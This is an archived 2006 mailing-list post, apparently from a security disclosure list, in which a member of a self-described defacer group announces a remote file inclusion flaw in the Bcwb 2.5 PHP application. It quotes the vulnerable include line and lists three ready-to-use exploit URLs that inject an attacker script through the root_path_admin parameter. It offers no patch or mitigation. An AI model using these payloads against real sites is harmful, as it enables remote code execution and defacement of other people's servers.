Multiple Remote File Include
- From: firewall1954@xxxxxxxxxxx
- Date: 30 Oct 2006 17:55:25 -0000
####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall
# Application Affect:
Bcwb 2.5
# Sorce Code:
http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download
# Code:
if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');
# ExPloit :
http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]
# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.
####################### Firewall #########################
- Prev by Date: CORE FORCE R0.95 released!
- Next by Date: Re: CentiPaid <= 1.4.2 [$class_pwd] Remote File Include
- Previous by thread: CORE FORCE R0.95 released!
- Next by thread: [security bulletin] HPSBMA02138 SSRT061184 rev.2 - HP OpenView Storage Data Protector, Remote Unauthorized Arbitrary Command Execution
- Index(es):
Relevant Pages
|
|
